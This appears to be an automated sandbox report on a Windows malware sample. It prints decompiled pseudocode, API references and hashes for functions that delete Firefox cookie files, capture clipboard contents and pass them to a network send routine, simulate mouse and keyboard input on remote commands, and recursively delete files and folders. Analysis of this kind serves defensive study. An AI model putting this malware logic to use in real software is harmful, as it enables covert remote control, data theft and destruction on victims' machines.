                              0x0040a692
                              0x0040a657
                              0x0040a658
                              0x0040a661
                              0x0040a663
                              0x0040a668
                              0x0040a668
                              0x0040a66d
                              0x0040a774
                              0x0040a774
                              0x0040a776
                              0x0040a779
                              0x0040a781
                              0x0040a78d

                              APIs
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A642
                              • FindClose.KERNEL32(00000000), ref: 0040A658
                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040A682
                              • DeleteFileA.KERNEL32(00000000,00000000), ref: 0040A72A
                              • GetLastError.KERNEL32 ref: 0040A734
                              • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040A748
                              • FindClose.KERNEL32(00000000), ref: 0040A76E
                              • FindClose.KERNEL32(00000000), ref: 0040A78F
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Find$File$Close$Next$DeleteErrorFirstLast
                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                              • API String ID: 532992503-432212279
                              • Opcode ID: 0d64f0fd255b8ee415b355969872e335040334bbf39fd31d40a8ecc0d88fdc24
                              • Instruction ID: a0e0b87e43e1ffccf28ad4a7bbdc78d64d502d6bba83e6bf3342b17ddf37f993
                              • Opcode Fuzzy Hash: 0d64f0fd255b8ee415b355969872e335040334bbf39fd31d40a8ecc0d88fdc24
                              • Instruction Fuzzy Hash: 32417C309002196ACB14FB75CC569EE7738AF11305F50417BE805B71D2EF3D9A4ACA9A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004126A5, Relevance: 18.1, APIs: 12, Instructions: 83clipboardmemoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 89%
                              			E004126A5(char* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
				void* __ebx;
				int _t10;
				void* _t20;
				void* _t22;
				void* _t31;
				struct HWND__* _t38;
				void* _t57;
				void* _t61;
				void* _t64;
				void* _t66;

				_t55 = __edx;
				_t10 = OpenClipboard(_t38);
				_t68 = _t10;
				if(_t10 != 0) {
					EmptyClipboard();
					L00401E29( &_a16, _t55, _t68, _t38);
					_t57 = GlobalAlloc(0x2000, E00402469() + 2);
					_t20 = GlobalLock(_t57);
					L00401E29( &_a12, _t55, _t68, _t38);
					_t22 = E00402469();
					L00431DF0(_t20, L00401F75(L00401E29( &_a8, _t55, _t68, _t38)), _t22);
					_t66 = _t64 + 0xc;
					GlobalUnlock(_t57);
					SetClipboardData(0xd, _t57);
					CloseClipboard();
					if(OpenClipboard(_t38) != 0) {
						_t61 = GetClipboardData(0xd);
						_t31 = GlobalLock(_t61);
						GlobalUnlock(_t61);
						CloseClipboard();
						_t50 =  !=  ? _t31 : 0x45f714;
						E0040425F(_t38,  &_a36,  !=  ? _t31 : 0x45f714);
						_t55 =  &_a32;
						L00416CF4(_t38, _t66 - 0x18,  &_a32);
						_push(0x6b);
						L00404A6E(_t38, 0x46c768,  &_a32, _t31);
						L00401ED0();
					}
				}
				L00401E54( &_a16, _t55);
				L00401FA7();
				L00401FA7();
				return 0;
			}













                              0x004126a5
                              0x004126a6
                              0x004126ac
                              0x004126ae
                              0x004126b4
                              0x004126bf
                              0x004126da
                              0x004126dd
                              0x004126ea
                              0x004126f1
                              0x0041270a
                              0x0041270f
                              0x00412713
                              0x0041271c
                              0x00412739
                              0x00412748
                              0x00412756
                              0x00412759
                              0x00412762
                              0x00412768
                              0x00412775
                              0x0041277d
                              0x00412785
                              0x0041278b
                              0x00412790
                              0x00412797
                              0x00412b2a
                              0x00412b2a
                              0x00412748
                              0x00412d65
                              0x00412d71
                              0x00412d7d
                              0x00412d8a

                              APIs
                              • OpenClipboard.USER32 ref: 004126A6
                              • EmptyClipboard.USER32 ref: 004126B4
                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004126D4
                              • GlobalLock.KERNEL32 ref: 004126DD
                              • GlobalUnlock.KERNEL32(00000000), ref: 00412713
                              • SetClipboardData.USER32(0000000D,00000000), ref: 0041271C
                              • CloseClipboard.USER32 ref: 00412739
                              • OpenClipboard.USER32 ref: 00412740
                              • GetClipboardData.USER32 ref: 00412750
                              • GlobalLock.KERNEL32 ref: 00412759
                              • GlobalUnlock.KERNEL32(00000000), ref: 00412762
                              • CloseClipboard.USER32 ref: 00412768
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                              • String ID:
                              • API String ID: 3520204547-0
                              • Opcode ID: 1176a2fa92a27c2bfc0c58389ed509e639c1d09a8cc1b0c481b7c4fd4d2cf595
                              • Instruction ID: 760fdb740c6fae1fa457759c4ec7e7655d91424e05930c477d6cb01e2b71feaa
                              • Opcode Fuzzy Hash: 1176a2fa92a27c2bfc0c58389ed509e639c1d09a8cc1b0c481b7c4fd4d2cf595
                              • Instruction Fuzzy Hash: 5D2151716043009BC214BF71ED5A9BF7769AB90746F04443EF806D21E2EF78CA09866A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00414923, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 173COMMON
                              Download Yara Rule
                              C-Code - Quality: 86%
                              			E00414923(signed int __edx, void* __eflags, char _a8) {
				void* _v28;
				char _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				intOrPtr* _t60;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t74;
				char* _t79;
				char* _t80;
				char* _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				intOrPtr _t90;
				signed int _t101;
				signed int _t109;
				signed int _t118;
				signed int _t136;

				_t136 = __edx;
				_t90 =  *((intOrPtr*)(E004051EA(0)));
				E00404286( &_a8,  &_v32, 1, 0xffffffff);
				if(_t90 != 0x30) {
					__eflags = _t90 - 0x31;
					if(_t90 != 0x31) {
						__eflags = _t90 - 0x32;
						if(_t90 != 0x32) {
							__eflags = _t90 - 0x33;
							if(_t90 != 0x33) {
								__eflags = _t90 - 0x34;
								if(_t90 != 0x34) {
									__eflags = _t90 - 0x35;
									if(_t90 != 0x35) {
										__eflags = _t90 - 0x36;
										if(_t90 == 0x36) {
											_push(0);
											_push(0x78);
											goto L15;
										}
									} else {
										_push(0);
										_push(0xffffff88);
										L15:
										mouse_event(0x800, 0, 0, ??, ??);
									}
								} else {
									_v40 =  *((intOrPtr*)(E004051EA(0)));
									_t60 = E004051EA(4);
									_t101 =  *0x46bd74; // 0x0
									_v40 =  *_t60;
									E004147BD( *((intOrPtr*)(0x46bd78 + _t101 * 4)),  &_v44, __eflags,  &_v40);
									L00414BEF(_v44, _v40);
								}
							} else {
								_t65 = E004051EA(0);
								_v44 =  *((intOrPtr*)(E004051EA(4)));
								_t67 = E004051EA(8);
								_t109 =  *0x46bd74; // 0x0
								_v44 =  *_t67;
								E004147BD( *((intOrPtr*)(0x46bd78 + _t109 * 4)),  &_v48, __eflags,  &_v44);
								L00414B93( *_t65, _v48, _v44);
								goto L8;
							}
						} else {
							_t72 = E004051EA(0);
							_v40 =  *((intOrPtr*)(E004051EA(4)));
							_t74 = E004051EA(8);
							_t118 =  *0x46bd74; // 0x0
							_v48 =  *_t74;
							E004147BD( *((intOrPtr*)(0x46bd78 + _t118 * 4)),  &_v44, __eflags,  &_v48);
							L00414B37( *_t72, _v44, _v48);
							goto L8;
						}
					} else {
						_t79 = E004051EA(4);
						_t80 = E004051EA(3);
						_t81 = E004051EA(2);
						_t82 = E004051EA(0);
						 *_t79 =  *_t80;
						__eflags =  *_t81;
						L00414C27( *_t82, __edx & 0xffffff00 |  *_t81 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0 |  *_t80 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0x000000ff);
						goto L8;
					}
				} else {
					E004051EA(0);
					_t85 = E004051EA(1);
					L00413F3B( *_t85, _t136 & 0xffffff00 |  *_t85 != 0x00000000,  *_t85, StrToIntA(E004051EA(2)));
					L8:
				}
				L00401FA7();
				return L00401FA7();
			}
























                              0x00414923
                              0x00414941
                              0x00414948
                              0x00414950
                              0x0041498f
                              0x00414992
                              0x004149ee
                              0x004149f1
                              0x00414a4e
                              0x00414a51
                              0x00414aaf
                              0x00414ab2
                              0x00414b00
                              0x00414b03
                              0x00414b0a
                              0x00414b0d
                              0x00414b0f
                              0x00414b10
                              0x00000000
                              0x00414b10
                              0x00414b05
                              0x00414b05
                              0x00414b06
                              0x00414b12
                              0x00414b19
                              0x00414b19
                              0x00414ab4
                              0x00414ac6
                              0x00414aca
                              0x00414acf
                              0x00414ae2
                              0x00414aeb
                              0x00414af9
                              0x00414af9
                              0x00414a53
                              0x00414a58
                              0x00414a6e
                              0x00414a76
                              0x00414a7b
                              0x00414a8e
                              0x00414a97
                              0x00414aa7
                              0x00000000
                              0x00414aa7
                              0x004149f3
                              0x004149f8
                              0x00414a0e
                              0x00414a16
                              0x00414a1b
                              0x00414a2e
                              0x00414a37
                              0x00414a47
                              0x00000000
                              0x00414a47
                              0x00414994
                              0x0041499a
                              0x004149a7
                              0x004149b4
                              0x004149c1
                              0x004149cc
                              0x004149d6
                              0x004149e3
                              0x00000000
                              0x004149e8
                              0x00414952
                              0x00414957
                              0x00414964
                              0x00414985
                              0x00414aac
                              0x00414aac
                              0x00414b23
                              0x00414b36

                              APIs
                              • StrToIntA.SHLWAPI(00000000,00000002,00000001,00000000,?,00000001,000000FF,00000000), ref: 00414977
                              • mouse_event.USER32 ref: 00414B19
                                • Part of subcall function 004147BD: GetSystemMetrics.USER32 ref: 004147F2
                                • Part of subcall function 004147BD: GetSystemMetrics.USER32 ref: 00414807
                                • Part of subcall function 00414BEF: SendInput.USER32(00000001,?,0000001C,?,00000000,?,00000001,000000FF,00000000), ref: 00414C1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: MetricsSystem$InputSendmouse_event
                              • String ID: 0$1$2$3$4$5$6
                              • API String ID: 1731092567-2737206560
                              • Opcode ID: 465a40b6c4bbad9506da93c7662b821433875c1b0bd26355eb879b2e96cd732d
                              • Instruction ID: 68c723f4934a31661bb6c48b0de6a348d1b664bcb13febd58c7bbbb5345cd8c0
                              • Opcode Fuzzy Hash: 465a40b6c4bbad9506da93c7662b821433875c1b0bd26355eb879b2e96cd732d
                              • Instruction Fuzzy Hash: CA518D70A083019FD704EF21D865F9B77A8EF95314F00492EF5525B2D1DF38AA49CB9A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004170AC, Relevance: 13.6, APIs: 9, Instructions: 147fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004170AC(WCHAR* __ecx) {
				char _v5;
				WCHAR* _v12;
				short _v532;
				short _v1052;
				struct _WIN32_FIND_DATAW _v1644;
				signed int _t52;
				intOrPtr _t53;
				char _t54;
				short _t55;
				signed int _t56;
				intOrPtr _t57;
				char _t58;
				signed int _t63;
				char _t68;
				void _t72;
				void _t73;
				signed int _t78;
				signed int _t84;
				void* _t86;
				intOrPtr* _t89;
				signed short* _t90;
				void* _t91;
				signed int _t95;
				void* _t100;
				void* _t102;
				signed short* _t103;
				void* _t106;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				void* _t112;
				void* _t118;
				void* _t120;
				void* _t123;
				void* _t124;

				_v12 = __ecx;
				_t103 = __ecx;
				_t118 =  &_v1052 - __ecx;
				do {
					_t52 =  *_t103 & 0x0000ffff;
					 *(_t118 + _t103) = _t52;
					_t103 =  &(_t103[1]);
				} while (_t52 != 0);
				_t89 =  &_v1052 - 2;
				do {
					_t53 =  *((intOrPtr*)(_t89 + 2));
					_t89 = _t89 + 2;
				} while (_t53 != 0);
				_t54 = L"\\*"; // 0x2a005c
				 *_t89 = _t54;
				_t106 =  &_v532 - __ecx;
				_t55 =  *0x465908; // 0x0
				 *((short*)(_t89 + 4)) = _t55;
				_t90 = __ecx;
				do {
					_t56 =  *_t90 & 0x0000ffff;
					 *(_t106 + _t90) = _t56;
					_t90 =  &(_t90[1]);
				} while (_t56 != 0);
				_t110 =  &_v532 - 2;
				do {
					_t57 =  *((intOrPtr*)(_t110 + 2));
					_t110 = _t110 + 2;
				} while (_t57 != 0);
				_t58 = "\\"; // 0x5c
				 *_t110 = _t58;
				_t86 = FindFirstFileW( &_v1052,  &_v1644);
				if(_t86 == 0xffffffff) {
					L34:
					return 0;
				}
				_t91 = 0;
				do {
					_t63 =  *(_t123 + _t91 - 0x210) & 0x0000ffff;
					_t91 = _t91 + 2;
					 *(_t123 + _t91 - 0x41a) = _t63;
				} while (_t63 != 0);
				_v5 = 1;
				do {
					if(FindNextFileW(_t86,  &_v1644) == 0) {
						if(GetLastError() != 0x12) {
							L33:
							FindClose(_t86);
							goto L34;
						}
						_t68 = 0;
						_v5 = 0;
						goto L23;
					}
					if(E00417036( &(_v1644.cFileName)) != 0) {
						L22:
						_t68 = _v5;
						goto L23;
					}
					_t107 =  &(_v1644.cFileName);
					_t120 = _t107;
					do {
						_t72 =  *_t107;
						_t107 = _t107 + 2;
					} while (_t72 != 0);
					_t108 = _t107 - _t120;
					_t112 =  &_v532 - 2;
					do {
						_t73 =  *(_t112 + 2);
						_t112 = _t112 + 2;
					} while (_t73 != 0);
					_t95 = _t108 >> 2;
					memcpy(_t112, _t120, _t95 << 2);
					memcpy(_t120 + _t95 + _t95, _t120, _t108 & 0x00000003);
					_t124 = _t124 + 0x18;
					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v532, 0x80);
						}
						if(DeleteFileW( &_v532) == 0) {
							goto L33;
						} else {
							_t100 = 0;
							do {
								_t78 =  *(_t123 + _t100 - 0x418) & 0x0000ffff;
								_t100 = _t100 + 2;
								 *(_t123 + _t100 - 0x212) = _t78;
							} while (_t78 != 0);
							goto L22;
						}
					}
					if(E004170AC( &_v532) == 0) {
						goto L33;
					}
					RemoveDirectoryW( &_v532);
					_t102 = 0;
					do {
						_t84 =  *(_t123 + _t102 - 0x418) & 0x0000ffff;
						_t102 = _t102 + 2;
						 *(_t123 + _t102 - 0x212) = _t84;
					} while (_t84 != 0);
					goto L22;
					L23:
				} while (_t68 != 0);
				FindClose(_t86);
				return RemoveDirectoryW(_v12);
			}






































                              0x004170c0
                              0x004170c3
                              0x004170c5
                              0x004170c7
                              0x004170c7
                              0x004170ca
                              0x004170ce
                              0x004170d1
                              0x004170dc
                              0x004170e1
                              0x004170e1
                              0x004170e5
                              0x004170e8
                              0x004170ed
                              0x004170f8
                              0x004170fa
                              0x004170fc
                              0x00417102
                              0x00417106
                              0x00417108
                              0x00417108
                              0x0041710b
                              0x0041710f
                              0x00417112
                              0x0041711d
                              0x00417122
                              0x00417122
                              0x00417126
                              0x00417129
                              0x0041712e
                              0x00417133
                              0x00417149
                              0x0041714e
                              0x00417296
                              0x00000000
                              0x00417296
                              0x00417154
                              0x00417156
                              0x00417156
                              0x0041715e
                              0x00417161
                              0x00417169
                              0x0041716e
                              0x00417172
                              0x00417182
                              0x00417286
                              0x0041728f
                              0x00417290
                              0x00000000
                              0x00417290
                              0x00417288
                              0x0041728a
                              0x00000000
                              0x0041728a
                              0x00417195
                              0x00417216
                              0x00417216
                              0x00000000
                              0x00417216
                              0x00417197
                              0x0041719f
                              0x004171a1
                              0x004171a1
                              0x004171a4
                              0x004171a7
                              0x004171b2
                              0x004171b4
                              0x004171b7
                              0x004171b7
                              0x004171bb
                              0x004171be
                              0x004171c5
                              0x004171c8
                              0x004171d6
                              0x004171d6
                              0x004171d8
                              0x0041723a
                              0x00417248
                              0x00417248
                              0x0041725d
                              0x00000000
                              0x0041725f
                              0x00417261
                              0x00417263
                              0x00417263
                              0x0041726b
                              0x0041726e
                              0x00417276
                              0x00000000
                              0x0041727b
                              0x0041725d
                              0x004171e7
                              0x00000000
                              0x00000000
                              0x004171f4
                              0x004171fc
                              0x004171fe
                              0x004171fe
                              0x00417206
                              0x00417209
                              0x00417211
                              0x00000000
                              0x00417219
                              0x00417219
                              0x00417222
                              0x00000000

                              APIs
                              • FindFirstFileW.KERNEL32(?,?,?,?,0046C238), ref: 00417143
                              • FindNextFileW.KERNEL32(00000000,?,?,?,0046C238), ref: 0041717A
                              • RemoveDirectoryW.KERNEL32(?,?,?,0046C238), ref: 004171F4
                              • FindClose.KERNEL32(00000000,?,?,0046C238), ref: 00417222
                              • RemoveDirectoryW.KERNEL32(?,?,?,0046C238), ref: 0041722B
                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,0046C238), ref: 00417248
                              • DeleteFileW.KERNEL32(?,?,?,0046C238), ref: 00417255
                              • GetLastError.KERNEL32(?,?,0046C238), ref: 0041727D
                              • FindClose.KERNEL32(00000000,?,?,0046C238), ref: 00417290
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                              • String ID:
                              • API String ID: 2341273852-0
                              • Opcode ID: fe33a7ecd763378ccfdde08d8187e5d99106823fa4ca85dde7b5a7b3d181c472
                              • Instruction ID: f55fdd06e51736921a03e431044bfc406960ad07d078f96de4dc955a1c0aff70
                              • Opcode Fuzzy Hash: fe33a7ecd763378ccfdde08d8187e5d99106823fa4ca85dde7b5a7b3d181c472
                              • Instruction Fuzzy Hash: 4C5105345042198ACF24DF68CC84AFAB7B5BF58305F5045EAE84993251EB359ECBCB98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0044190C, Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 76%
                              			E0044190C(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				signed int _t167;
				intOrPtr* _t168;
				void* _t169;
				intOrPtr _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t178 = __esi;
				_t171 = __edi;
				_t65 = E0044154B();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E004415A9( &_v8) != 0 || E00441551( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043629A();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E0044154B();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E004415A9( &_v52);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E0043629A();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x46a00c; // 0x5d382218
						_v100 = _t74 ^ _t192;
						 *0x46a344 =  *0x46a344 | 0xffffffff;
						 *0x46a338 =  *0x46a338 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t139 = "TZ";
						_t172 = 0;
						 *0x46b748 = 0;
						_t78 = E004391A5(__eflags,  &_v360,  &_v356, 0x100, "TZ");
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E0043E61D(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E004391A5(__eflags,  &_v280, _t184, _v276, _t139);
									__eflags = _t85;
									if(_t85 == 0) {
										L0043EE85(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									L0043EE85();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L80:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L80;
							} else {
								_push(_t172);
								E0044190C(_t139, _t172, _t183, __eflags);
							}
						}
						L0043EE85(_t183);
						__eflags = _v16 ^ _t192;
						return E0042F61B(_v16 ^ _t192);
					} else {
						_t89 = E00441551( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E0044157D( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								L0043EE85( *0x46b740);
								 *0x46b740 = 0;
								 *_t194 = 0x46b750;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x46b750 * 0x3c;
									_t167 =  *0x46b7a4; // 0x0
									_push(_t171);
									 *0x46b748 = 1;
									_v12 = _t150;
									__eflags =  *0x46b796; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t167 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x46b7ea; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x46b7f8; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t167) * 0x3c;
										}
									}
									_t176 = E0043E1EC(0, _t167);
									_t99 = WideCharToMultiByte(_t176, 0, 0x46b754, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x46b7a8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E00441545()) = _v12;
								 *((intOrPtr*)(E00441539())) = _v16;
								_t96 = E0044153F();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t168 =  *0x46b740; // 0x0
					_t178 = _a4;
					if(_t168 == 0) {
						L12:
						L0043EE85(_t168);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x441cfd
						_t169 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t169 + 1; // 0x441cfe
						 *0x46b740 = E0043E61D(_t154 - _t169, _t13);
						_t116 = L0043EE85(0);
						_t170 =  *0x46b740; // 0x0
						if(_t170 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x441cfd
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x441cfe
							_t119 = E004405A6(_t170, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E0044C479(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E00436079(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E00436079(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E00436079(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E00441545()) = _v8;
										_t128 = E00441539();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E0044C479(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t168;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L82:
			}




































































                              0x0044190c
                              0x0044190c
                              0x00441916
                              0x0044191b
                              0x0044191f
                              0x00441921
                              0x00441929
                              0x00441934
                              0x00441ad4
                              0x00441ad6
                              0x00441ad7
                              0x00441ad8
                              0x00441ad9
                              0x00441ada
                              0x00441adb
                              0x00441ae0
                              0x00441ae4
                              0x00441ae6
                              0x00441ae9
                              0x00441af0
                              0x00441af7
                              0x00441afb
                              0x00441afe
                              0x00441b01
                              0x00441b06
                              0x00441b07
                              0x00441b09
                              0x00441c31
                              0x00441c31
                              0x00441c32
                              0x00441c33
                              0x00441c34
                              0x00441c35
                              0x00441c36
                              0x00441c3b
                              0x00441c3e
                              0x00441c3f
                              0x00441c47
                              0x00441c4e
                              0x00441c51
                              0x00441c5e
                              0x00441c65
                              0x00441c66
                              0x00441c67
                              0x00441c68
                              0x00441c6d
                              0x00441c7c
                              0x00441c83
                              0x00441c8b
                              0x00441c8d
                              0x00441c97
                              0x00441c9a
                              0x00441ca7
                              0x00441caa
                              0x00441cac
                              0x00441cc5
                              0x00441ccd
                              0x00441ccf
                              0x00441cd5
                              0x00441cda
                              0x00441cd1
                              0x00441cd1
                              0x00000000
                              0x00441cd1
                              0x00441cae
                              0x00441cae
                              0x00441caf
                              0x00441caf
                              0x00441caf
                              0x00441cdc
                              0x00441c8f
                              0x00441c8f
                              0x00441c8f
                              0x00441ce9
                              0x00441ceb
                              0x00441ced
                              0x00441cef
                              0x00441cff
                              0x00441cff
                              0x00441cf1
                              0x00441cf1
                              0x00441cf4
                              0x00000000
                              0x00441cf6
                              0x00441cf6
                              0x00441cf7
                              0x00441cfc
                              0x00441cf4
                              0x00441d05
                              0x00441d10
                              0x00441d1b
                              0x00441b0f
